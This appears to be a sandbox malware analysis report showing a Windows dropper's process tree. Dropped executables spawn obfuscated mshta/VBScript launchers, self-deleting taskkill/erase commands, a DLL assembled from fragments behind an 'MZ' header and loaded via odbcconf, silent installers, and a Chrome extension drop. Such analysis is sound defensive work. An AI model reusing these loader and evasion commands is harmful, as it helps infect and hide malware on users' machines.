                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "Fri209e1eb19c.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri209e1eb19c.exe" & exit
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                      PID:4816
                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                        taskkill /im "Fri209e1eb19c.exe" /f
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                        PID:4520
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c Fri20be0777551040f32.exe
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:3140
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri20be0777551040f32.exe
                                                                                                                                                                                                    Fri20be0777551040f32.exe
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                    PID:3412
                                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" VBscriPT: closE ( CReAteoBjEcT ( "wScRIpT.ShEll" ). RUn ( "C:\Windows\system32\cmd.exe /q /c coPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri20be0777551040f32.exe"" dSaU40W5.ExE && sTarT DsaU40W5.exE /pvkJlKE4Jas7gQ & iF """" == """" for %s IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri20be0777551040f32.exe"" ) do taskkill -IM ""%~nXs"" /F " , 0 ,trUe ) )
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:3664
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          "C:\Windows\system32\cmd.exe" /q /c coPY /Y "C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri20be0777551040f32.exe" dSaU40W5.ExE && sTarT DsaU40W5.exE /pvkJlKE4Jas7gQ & iF "" == "" for %s IN ( "C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri20be0777551040f32.exe" ) do taskkill -IM "%~nXs" /F
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                            PID:4380
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\dSaU40W5.ExE
                                                                                                                                                                                                              DsaU40W5.exE /pvkJlKE4Jas7gQ
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                              PID:4724
                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" VBscriPT: closE ( CReAteoBjEcT ( "wScRIpT.ShEll" ). RUn ( "C:\Windows\system32\cmd.exe /q /c coPY /Y ""C:\Users\Admin\AppData\Local\Temp\dSaU40W5.ExE"" dSaU40W5.ExE && sTarT DsaU40W5.exE /pvkJlKE4Jas7gQ & iF ""/pvkJlKE4Jas7gQ "" == """" for %s IN ( ""C:\Users\Admin\AppData\Local\Temp\dSaU40W5.ExE"" ) do taskkill -IM ""%~nXs"" /F " , 0 ,trUe ) )
                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                  PID:992
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /q /c coPY /Y "C:\Users\Admin\AppData\Local\Temp\dSaU40W5.ExE" dSaU40W5.ExE && sTarT DsaU40W5.exE /pvkJlKE4Jas7gQ & iF "/pvkJlKE4Jas7gQ " == "" for %s IN ( "C:\Users\Admin\AppData\Local\Temp\dSaU40W5.ExE" ) do taskkill -IM "%~nXs" /F
                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                      PID:4968
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" vbSCrIpt: cLOSe (cREatEOBJecT ( "WscripT.SHeLL" ). Run ( "cMd.eXe /Q /C echo | seT /P = ""MZ"" > VjcFAPpO.Q4 & copY /y /b VJcFAppO.Q4 + YQIFB2E1.V0E + oEMR_.C~2 +AgL~7F.X+mfEBT.JK + S9TpcxeR.11P FCBUT_S.vQ & STarT odbcconf.exe /A { Regsvr .\FcbUT_S.VQ } " , 0 , TruE ) )
                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                      PID:6360
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /Q /C echo | seT /P = "MZ" > VjcFAPpO.Q4 & copY /y /b VJcFAppO.Q4 + YQIFB2E1.V0E + oEMR_.C~2 +AgL~7F.X+mfEBT.JK + S9TpcxeR.11P FCBUT_S.vQ & STarT odbcconf.exe /A {Regsvr .\FcbUT_S.VQ }
                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                          PID:5996
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo "
                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                              PID:7568
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>VjcFAPpO.Q4"
                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                PID:7636
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\odbcconf.exe
                                                                                                                                                                                                                                odbcconf.exe /A {Regsvr .\FcbUT_S.VQ }
                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                PID:4452
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                          taskkill -IM "Fri20be0777551040f32.exe" /F
                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                          PID:5008
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Fri204accdcd745.exe
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:3364
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri204accdcd745.exe
                                                                                                                                                                                                                      Fri204accdcd745.exe
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                      PID:2740
                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\rQRoDiXJFdL11xM_1227uYUC.exe
                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\rQRoDiXJFdL11xM_1227uYUC.exe"
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        PID:4940
                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\7Jd__galKjV8LKL2MuotQmeQ.exe
                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\7Jd__galKjV8LKL2MuotQmeQ.exe"
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                        PID:2968
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im 7Jd__galKjV8LKL2MuotQmeQ.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\7Jd__galKjV8LKL2MuotQmeQ.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                            PID:1408
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                              taskkill /im 7Jd__galKjV8LKL2MuotQmeQ.exe /f
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                              PID:6760
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                              timeout /t 6
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                              PID:6792
                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\1pPQuED90OnoPWqIwzP9Pskw.exe
                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\1pPQuED90OnoPWqIwzP9Pskw.exe"
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                          PID:4776
                                                                                                                                                                                                                          • C:\Users\Admin\Documents\f5K63FHeRshibBJ43zuCSQVm.exe
                                                                                                                                                                                                                            "C:\Users\Admin\Documents\f5K63FHeRshibBJ43zuCSQVm.exe"
                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                            PID:7888
                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\21chU6DPCX65bVjtvr_gBDqp.exe
                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\21chU6DPCX65bVjtvr_gBDqp.exe"
                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                PID:7592
                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\2JD6CMCcBu9REszklpAFYVNS.exe
                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\2JD6CMCcBu9REszklpAFYVNS.exe"
                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                  PID:9556
                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\F4UYPExn29eAKQlBov6DMVL9.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\F4UYPExn29eAKQlBov6DMVL9.exe"
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                  • Drops Chrome extension
                                                                                                                                                                                                                                  PID:10044
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                      PID:5384
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                        taskkill /f /im chrome.exe
                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                                                                        PID:7504
                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                      • Enumerates system info in registry
                                                                                                                                                                                                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                      PID:1008
                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffc6a7c4f50,0x7ffc6a7c4f60,0x7ffc6a7c4f70
                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                          PID:676
                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1640,1207909197333982850,265225201434212991,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2356 /prefetch:8
                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                            PID:5516
                                                                                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,1207909197333982850,265225201434212991,131072 --lang=en-US --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2680 /prefetch:1
                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                              PID:6916
                                                                                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,1207909197333982850,265225201434212991,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2672 /prefetch:1
                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                PID:7148
                                                                                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1640,1207909197333982850,265225201434212991,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1716 /prefetch:8
                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                  PID:2144
                                                                                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1640,1207909197333982850,265225201434212991,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1656 /prefetch:2
                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                    PID:6324
                                                                                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,1207909197333982850,265225201434212991,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3524 /prefetch:1
                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                      PID:3928
                                                                                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,1207909197333982850,265225201434212991,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3692 /prefetch:1
                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                        PID:884
                                                                                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,1207909197333982850,265225201434212991,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4608 /prefetch:8
                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                          PID:6272
                                                                                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,1207909197333982850,265225201434212991,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4704 /prefetch:8
                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                            PID:4520
                                                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\JuNAYSprz65PzCu6y9HAPPN5.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\JuNAYSprz65PzCu6y9HAPPN5.exe"
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                        PID:10036
                                                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\qeROKJSN6QO5z_OPB2ZpR3ia.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\qeROKJSN6QO5z_OPB2ZpR3ia.exe"
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                          PID:3532
                                                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\gY7XoyGJh7ombSwAn56Cgs3e.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\gY7XoyGJh7ombSwAn56Cgs3e.exe"
                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                            PID:6980
                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-1HAV4.tmp\gY7XoyGJh7ombSwAn56Cgs3e.tmp
                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-1HAV4.tmp\gY7XoyGJh7ombSwAn56Cgs3e.tmp" /SL5="$50588,142095,58368,C:\Users\Admin\Pictures\Adobe Films\gY7XoyGJh7ombSwAn56Cgs3e.exe"
                                                                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                                                                PID:9328
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-FJU2V.tmp\((((_________456.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-FJU2V.tmp\((((_________456.exe" /S /UID=2709
                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                    PID:620
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\04-f76a6-878-004b9-bcbc304a75d2f\Jejuvokaebi.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\04-f76a6-878-004b9-bcbc304a75d2f\Jejuvokaebi.exe"
                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                                                                                      PID:1048
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\9d-f64f8-02d-b98b5-648cb5bc830de\Xuzharehylu.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\9d-f64f8-02d-b98b5-648cb5bc830de\Xuzharehylu.exe"
                                                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                                                        PID:4288
                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1e1t1wvc.k3o\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                          PID:7048
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1e1t1wvc.k3o\installer.exe
                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\1e1t1wvc.k3o\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                                            • Enumerates connected drives
                                                                                                                                                                                                                                                                            • Modifies system certificate store
                                                                                                                                                                                                                                                                            PID:9448
                                                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y5uvl4vg.ss4\any.exe & exit
                                                                                                                                                                                                                                                                          12⤵
                                                                                                                                                                                                                                                                            PID:7184
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\y5uvl4vg.ss4\any.exe
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\y5uvl4vg.ss4\any.exe
                                                                                                                                                                                                                                                                              13⤵
                                                                                                                                                                                                                                                                                PID:5516
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\y5uvl4vg.ss4\any.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\y5uvl4vg.ss4\any.exe" -u
                                                                                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                                                                                    PID:4396
                                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5qcwv0qf.ime\autosubplayer.exe /S & exit
                                                                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                                                                  PID:6864
                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                                                                                                      PID:9144
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\5qcwv0qf.ime\autosubplayer.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\5qcwv0qf.ime\autosubplayer.exe /S
                                                                                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                      PID:4212
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsy75A.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                                                                          PID:8832
                                                                                                                                                                                                                                                                                  • C:\Program Files\Mozilla Firefox\INNFXHGQHP\foldershare.exe
                                                                                                                                                                                                                                                                                    "C:\Program Files\Mozilla Firefox\INNFXHGQHP\foldershare.exe" /VERYSILENT
                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                      PID:5396
                                                                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\_asFl0lPYBlG4aupOtAaXBYa.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\_asFl0lPYBlG4aupOtAaXBYa.exe"
                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                PID:9300
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Traffic\setup.exe
                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Traffic\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                                    PID:8456
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe" "--LtZfagcw"
                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                                                                                                                      PID:10372
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Traffic\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Traffic\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Traffic\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Traffic\User Data" --annotation=plat=Win64 --annotation=prod=Traffic --annotation=ver=0.0.13 --initial-client-data=0x370,0x338,0x334,0x378,0x37c,0x7ffc7173dec0,0x7ffc7173ded0,0x7ffc7173dee0
                                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                                          PID:5464
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe
                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Traffic\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Traffic\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Traffic --annotation=ver=0.0.13 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff6fa4a9e70,0x7ff6fa4a9e80,0x7ff6fa4a9e90
                                                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                                                              PID:11020
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1628,9403913921633612379,1120878466398652403,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Traffic\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10372_1794557714" --mojo-platform-channel-handle=1728 /prefetch:8
                                                                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                                                                              PID:7816
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe" --type=gpu-process --field-trial-handle=1628,9403913921633612379,1120878466398652403,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Traffic\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10372_1794557714" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1620 /prefetch:2
                                                                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                                                                PID:1012
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1628,9403913921633612379,1120878466398652403,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Traffic\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10372_1794557714" --mojo-platform-channel-handle=2040 /prefetch:8
                                                                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                                                                  PID:3444
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Traffic\Traffic.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Traffic\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1628,9403913921633612379,1120878466398652403,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Traffic\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10372_1794557714" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2416 /prefetch:1
                                                                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                                                                                                  PID:6788
